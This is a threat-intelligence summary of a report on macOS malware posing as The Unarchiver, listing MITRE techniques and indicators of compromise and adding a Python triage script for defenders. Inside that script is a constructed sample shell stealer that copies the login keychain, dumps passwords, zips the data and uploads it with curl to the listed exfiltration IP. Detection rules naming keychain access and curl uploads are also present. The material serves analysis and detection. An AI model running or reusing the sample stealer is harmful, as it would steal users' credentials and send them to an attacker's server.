macOS malware masquerades as The Unarchiver to harvest user data via an unsigned disk image. The analysis finds Swift-based components that exfiltrate data to a remote URL, with Russian-language comments suggesting the malware author’s origin. #TheUnarchiver #CryptoTrade
Key points
- Phishing site impersonates The Unarchiver to lure users into downloading a malicious disk image.
- The disk image TheUnarchiver.dmg is unsigned, raising questions about its legitimacy.
- Initial security scoring (e.g., Hatching Triage) shows low detection rates, prompting deeper analysis.
- Malicious scripts within the artifact are designed to capture user information and exfiltrate it via a specified URL.
- The malware is written in Swift and includes indicators of data exfiltration to external infrastructure.
- Code comments in Russian suggest the author's origin, or at least familiarity with the Russian language.
MITRE Techniques
- [T1003] Credential Dumping – Extracts stored credentials from the system. ‘Scripts such as grab_keychain.sh are designed to extract stored credentials from the system.’
- [T1041] Data Exfiltration – Exfiltrates data to a specified URL using curl. ‘Data is exfiltrated using curl to a specified URL, indicating a method of transferring stolen information.’
- [T1059] Command and Scripting Interpreter – Uses shell scripts to perform information gathering and exfiltration. ‘Shell scripts are used to execute commands for information gathering and exfiltration.’
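As an added, defender-side example that is not part of the Hunt.io report: a small Python triage helper that flags the behaviours described above (keychain access, a curl upload, archive staging, Cyrillic comments) in a shell script and matches the report's IoCs. The sample script is constructed to resemble the described behaviour and is not the actual malware's code; the rule set and scoring weights are assumptions.

```python
import re

# Constructed sample resembling the behaviour described in the report
# (keychain access, zip staging, curl upload to the listed IP). Not the real script.
SAMPLE_SCRIPT = """#!/bin/bash
# сбор данных (constructed Russian-language comment)
cp ~/Library/Keychains/login.keychain-db /tmp/grabber/
security find-generic-password -a "$USER" -s "example" > /tmp/grabber/pw.txt
zip -r /tmp/grabber.zip /tmp/grabber
curl -F "file=@/tmp/grabber.zip" http://81.19.137.179/upload
"""

# Heuristic rules (assumed, not from the report): each maps to a TTP above.
RULES = {
    "keychain_access": re.compile(r"(Library/Keychains|\bsecurity\s+find-\w+-password)"),
    "exfil_curl_upload": re.compile(r"\bcurl\b.*(-F|--form|-d|--data|-T|--upload-file)"),
    "archive_staging": re.compile(r"^\s*(zip|tar)\b.*\.(zip|tar|tgz)"),
    "cyrillic_comment": re.compile(r"#.*[\u0400-\u04FF]"),
}

# Network indicators taken from the report's IoC list.
IOC_NETWORK = {"81.19.137.179", "tneunarchiver.com", "cryptomac.dev"}


def triage_script(text):
    """Return rule name -> matching line numbers, plus (line, indicator) IoC hits."""
    findings = {name: [] for name in RULES}
    findings["ioc_hits"] = []
    for n, line in enumerate(text.splitlines(), 1):
        for name, rx in RULES.items():
            if rx.search(line):
                findings[name].append(n)
        for ioc in sorted(IOC_NETWORK):
            if ioc in line:
                findings["ioc_hits"].append((n, ioc))
    return findings


def score(findings):
    """Assumed weights: keychain access combined with a curl upload is the key pairing."""
    s = 0
    s += 3 if findings["keychain_access"] else 0
    s += 3 if findings["exfil_curl_upload"] else 0
    s += 1 if findings["archive_staging"] else 0
    s += 5 if findings["ioc_hits"] else 0
    return s


if __name__ == "__main__":
    f = triage_script(SAMPLE_SCRIPT)
    print(f, "score:", score(f))
```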
Indicators of Compromise
- [SHA-1] Disk image hash – 4932e7da6b21e1e37c507c42d40951ba53a83cf4
- [Domain] Phishing domains – tneunarchiver.com, cryptomac.dev
- [IP Address] Exfiltration server – 81.19.137.179
- [File Name] Artifacts – TheUnarchiver.dmg, grabber.zip
Read more: https://hunt.io/blog/macos-malware-impersonates-the-unarchiver-app-to-steal-user-data